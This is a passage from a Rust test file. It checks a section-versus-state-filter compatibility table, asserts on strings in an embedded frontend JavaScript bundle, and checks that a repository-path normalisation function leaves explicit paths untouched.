10005 let filter_keys = ["active", "flight", "stale", "waiting", "done", "all"];
10006
10007 for (section, wants) in expected {
10008 for (filter_key, want) in filter_keys.iter().zip(wants) {
10009 assert_eq!(
10010 compatible(section, filter_key),
10011 want,
10012 "section {section:?} x filter {filter_key:?} should be compatible: {want}"
10013 );
10014 }
10015 }
10016
10017 assert!(
10020 APP_JS.contains("function sectionCompatibleWithStateFilter(sectionKey, filterKey)")
10021 );
10022 assert!(APP_JS.contains(
10023 "if (state.runsFilter.section && !sectionCompatibleWithStateFilter(state.runsFilter.section, key))"
10024 ));
10025 assert!(APP_JS.contains(
10026 "if (!same && !sectionCompatibleWithStateFilter(section, state.runsStateFilter))"
10027 ));
10028 }
10029
10030 #[tokio::test]
10031 async fn normalize_default_repo_leaves_an_explicit_path_untouched() {
10032 let dir = tempfile::tempdir().expect("tempdir");
10036 let explicit = dir.path().join("not-a-checkout");
10037 std::fs::create_dir_all(&explicit).expect("create dir");
10038 assert_eq!(normalize_default_repo(explicit.clone()).await, explicit);
10039
10040 let missing = dir.path().join("does-not-exist-at-all");
10041 assert_eq!(normalize_default_repo(missing.clone()).await, missing);
10042 }
10043}